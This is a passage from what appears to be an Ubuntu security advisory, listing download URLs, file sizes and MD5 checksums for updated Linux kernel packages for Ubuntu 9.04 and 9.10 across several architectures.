http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    44118 4a5fac5654db234e70a2e9eaccbf4285
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    43320 9952d12ff6a86714d06bfcf4bc9e4440
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    51118 7f9136aa3cb5b1041cf0551ddef98511
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    90086 f2df406121a67d4e0a47175ec1d71d9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    38016 d766f9f96987f7493d4fc61e591a8b33
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   521640 fe11a00a5429edfe67d479e8d825a39b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   125832 b4d69c3d7c5c847d8aa24d837db44486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    58072 68d73aff5009f5d5040372f2a46c49e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   312522 221708988c790d5e0fdbc477aaa81323
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:  3870958 c7c36beae2f7bf5930443ed3f6fddeb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_amd64.deb
  Size/MD5:   690350 78eff761f3de3ca6b6a5d787b0913386
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_amd64.deb
  Size/MD5:   689874 2f16c0b044e2f930a6de88d26682a404
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_amd64.deb
  Size/MD5: 24343062 cfe2467fe5ca7affab65e8735c698df5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_amd64.deb
  Size/MD5: 24339190 440cbba0ae0f1b19d0a68ee7499ca3ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_amd64.deb
  Size/MD5: 10552344 058b8ed0770e4aa1df480e174f857778
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_amd64.deb
  Size/MD5:   767088 f35f8e695c44c813079736c9c17bd5e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   215202 fcf462d6720a7273ee02c49782e83b13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   189510 9b19fb1abe93c181fe5fda8e72b8cd26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    29406 6288043ea717a7305dc8510cd2f421e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   274494 036b1935bbceccd31a7ed7e41f473f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:  1933878 13697cd495d281f48696d983541ffe7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   163480 8de928fc197b8b89ef1c7750a38b0d76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   194830 74b0f571685be779768609c16a414346
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   153010 3f9d7d19adf9afb4419a80ad04231009
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    36498 fd7232b8dcf13ff08280ca63caeae302
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:     5838 1cc67d1a6c420276e6f59db3ed9942c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    72150 a499b73933f58ec19e04b6428fb82185
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    22718 56724a5b7bcc91aff7be15700c0a82ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:     8874 a4f0e53f6b6d2cacf54c6a9ac9eab37c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    47442 b366ca0d5084bac531ddfbb50a9d51a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    15662 a0d315f845d9b5688dd17954a62f9d92
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:  1273634 e0047421d0cb50d5b39c75c97274697a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    47210 8ea312e79dd8c391c34b6b69cd257977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    72702 c6ffab61cbfcfdc2e32cbf60f1d4958a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:   126982 d6ede00cbf90e3b77fb8472fb3a9ee2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb
  Size/MD5:    13472 d48c09cb3270f0372ba5adfbba467306

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   215872 98aa4e99386167781b23b5504cbc8591
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    46666 ede37f43ef40b34f9d77fc4640514651
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    41356 cb2e3f87cf5642a12835a48f2f7efa8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    47404 aeaca1593385350dc704f57aaf625b73
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    86924 5ea2819a5c30ce4c89a2bce2bd4627aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    33574 2cb4c345fe2fb221897102c5014d2017
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   525756 f090c1ccf69ddb2820186927c85dcd98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   125642 86e82e5dd9d4f57969d66c72ec5f41eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    54880 6e13577469a187fece4e004a80668b48
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   301354 a8a087c11396b663d52e6fbb2fc419e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:  3744732 3bf841c6e53f9a9d6c352609cd21570b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-generic_2.6.28-19.61_i386.deb
  Size/MD5:   674722 ae9bf80ad2a72a2eab03a182d0b076ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_i386.deb
  Size/MD5:   676386 672cfd17c45527cfcc4b74abad9f652d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_i386.deb
  Size/MD5: 24657574 7a23546eec680913e2335da9389181da
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-server_2.6.28-19.61_i386.deb
  Size/MD5: 24781358 fd198c0b13ba70eadc83348ae87cf2f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_i386.deb
  Size/MD5: 10250202 cdd81611c7865173650be382716316c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_i386.deb
  Size/MD5:   767068 fbe363b42e813979a49a7444adface7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   218104 238d1fa355579b3e5c3b9a5f409ba412
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   174930 6c69f1ebda0371c7145ba0889931890b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    30066 f825580f63a3220d9ec048f5660309c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   262836 1ea6cea34f931354abe2c01aa8698f01
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:  2110024 0ad4a3aab3642c6ff44b65e2155483d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   150224 04dcd6e520494576ac6e06aa863e73d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   184330 40e357d4f7c99b886a6b7a00170177a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   143594 38768a0d3f979c7cd662d6f2d23b4a68
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    34576 dd9d68b4aa49cd96d1a4957ea1758668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:     5506 9e285ac21f1486b3ac73103b3e96fd40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    86008 578f19d536439c1b0aada7f86ccb7241
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    47638 fe2306b25d5f55bd6566a0c2291505dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:     8714 342c255e7f6fb6cc33b68075f0e21550
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    44690 94d2c332f5947f4dce037570ce39b35e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    14778 0fe26ba732bfbe35baf944ae3b0e0bf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:  1446006 a016a4624c870f7359e89d436e94bfca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    44098 8a7b3746af4ee04b564c8bd8caf17027
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    69286 f10cde36cc89019b0a2cc3ca37dd1570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:   119542 b1a3003512dc0814ad58c46d29cea106
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb
  Size/MD5:    12676 17546e9dd8ca873e2b2ab89c04274faf

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   215272 2da99e7865fed571480c1daf83362c2c
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    46658 d88e490bb0b9783884ee8c7d7268af02
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    40958 658c3596adb419ab460d1bec285c84ea
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    47310 20f31bf3e8154ce4e165a26ee05829b0
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    86524 220c27bce804ca2f28a07b1aa05a6724
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    33270 77f0d3419e8bce3aadab46745a89da47
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   523812 ca9ae4910b3b80db2b5f66df497b97bf
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   125274 df84493025631f40a26684e18fcbdcad
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    63562 aa198524f22feac47e6afeb90b4814a3
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   300758 e2f88dfcf8062c76ba8feb73009c470c
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:  3036096 18ba173775e4bd72614757f96464f43b
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-19-lpia_2.6.28-19.61_lpia.deb
  Size/MD5:   643960 a59344b6416b7986fc4e381d2cff448b
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-19-lpia_2.6.28-19.61_lpia.deb
  Size/MD5: 21804176 6d5ada4bd63dc0267ec128ec5523d603
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_lpia.deb
  Size/MD5:   767048 119ec87226497a4cd35ac1616c110f8b
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   303974 013d213d0147879eaf3b03ee5a52ba62
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   157420 daa1b45750cf096ca0f21c2e9805338c
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    24444 a4604496dbae27099d5e99be02661e86
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   260358 050d3379257c6db05af1d9cbea5246e5
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:  2027504 b41779f2e28f1a64bfef1328e0d46025
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   149404 0b24ae1029ee3377f090ce81937f591b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   184738 4a4709ebe1e07dba8e80164d5d99457e
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   143256 93d56d8675a88d483b206a0bd915cc10
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    34466 b307ad93ea4f7c264c20833070f32599
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:     5496 ae5a05934e8cb5b52e0793ba2bf8804b
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    85658 c8746bbbb6796a2bff3fa6b336ed74b4
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    47404 6230bb1e8b46bd653ac5d3ef9d9052b7
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:     8712 fed56dd339cc12bb2c623a54da9d5b3a
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    63108 18cf630fa14beb0692f7398167e8b691
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    14718 8ee6802e848c75ca39da8ee1e02f0314
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:  1447856 77369ff1a3bd4417251f3f1de7dc504f
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:    43896 f514d1c6dc5f0edf987eab1993eff850
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   155176 0dd0d60e9685c6f1f092e7fba12f0d2c
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:   172682 daee398b65ec579129a974398bafe526
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb
  Size/MD5:     8152 f19e4bed18e1f803f2403c1f76bb4567

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.diff.gz
  Size/MD5:  9270340 efbacad31add4310d608052e0138cdfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.dsc
  Size/MD5:     2706 ab7417b57fac2e918ab18b71748eaa25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.diff.gz
  Size/MD5:  4002602 7156a2ff98e4a29eca8db92dd27cae34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.dsc
  Size/MD5:     2180 e004ede760b9ead8acfb08aae3626bd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.diff.gz
  Size/MD5:  4613937 a6d34bc737f45065a7856ca478f09ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.dsc
  Size/MD5:     2214 2387eb27814bd67f0788fd0450f400ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.diff.gz
  Size/MD5:  2968144 51d9f41be632d0069d48b6fb7c53b059
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-22.60.dsc
  Size/MD5:     3782 1027672ce46ed3c00dd0fcc4682a64f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-307.15_all.deb
  Size/MD5:  3801110 11ec385a097f99220d5ddb6c2e2f4002
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-307.15_all.deb
  Size/MD5: 64261132 ed0333508c22109f028ae2ef766fc85f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307_2.6.31-307.15_all.deb
  Size/MD5:  9674276 489c1295818e3e5ee4832104c483a0ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-22.60_all.deb
  Size/MD5:  3802616 a36b05da0395ec7db681dc19fb2f1300
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22_2.6.31-22.60_all.deb
  Size/MD5:  9542888 f10672f2db8403df76eca5b20694b8f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-22.60_all.deb
  Size/MD5: 62194756 b7cc137763d5af113a71e31e6ac22f78

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-307-ec2_2.6.31-307.15_amd64.deb
  Size/MD5:   611656 2c695d1b064b808c1a2302ab2b886977
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_amd64.deb
  Size/MD5: 18766724 49915d82add98b1256e69fe1bfe8078e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   221404 254b05d713505665c031b4496b163c22
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    15634 c74946f44729c910272e9ea7818630b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    52140 f69d9ea44c436108e9d12948b8136090
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    44830 cf091e89005a5a90931b7f752bdadf69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    50086 7aeca28683007786d5ebd9ef1ed3ac26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    92532 b98c59ba794fd8779c7d72bfaaed0197
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    37776 b8bef8f976de7b77be419a138bcae78b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   537596 6b955d65ff2d68e8d95051cf094907c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   130680 f33ba0ee944acc4719c2967a1dcabdb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    53836 f67f7cc6ef67dcf7f672fd569a89452f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   310082 9c1873f4f9d43672eb590a7321e1d6f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:  4360720 16490513f45ae6688ed2bde11abf9e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic_2.6.31-22.60_amd64.deb
  Size/MD5:   708238 ece5100190ee7b1cfe205a988482f652
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-server_2.6.31-22.60_amd64.deb
  Size/MD5:   706794 eabe25a6ab5ecf566b6155d1e40b098b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_amd64.deb
  Size/MD5: 28945438 dcaf7dcfd8fd1bb8396403a8385f00c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-server_2.6.31-22.60_amd64.deb
  Size/MD5: 28940552 0345077dd48fee880de7036f7b9565ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-virtual_2.6.31-22.60_amd64.deb
  Size/MD5: 11766174 dd131468e97785447d16e271b9f0c96e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_amd64.deb
  Size/MD5:   753492 0a0b60ed5f9fd5317d117b348c25a226
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   168332 2698dddf736f1f55b43ee796f36025d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   202808 83c4daba95357805420dfd042b326624
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:    27744 04f33c682c35a27fb0622c0ccfc64539
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   311822 4748943e01de51f9fa0afe1e6667ba11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:  2281794 cc0444cb92dfe6d42f1c29cf37020399
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   158660 ddaf46384d9657ea1afd15f0b7a04381
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   203114 0a8ba89a3ac2c15fba026750b7724b9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb
  Size/MD5:   161070 67957e42b693445a8bec0d1e65e55026
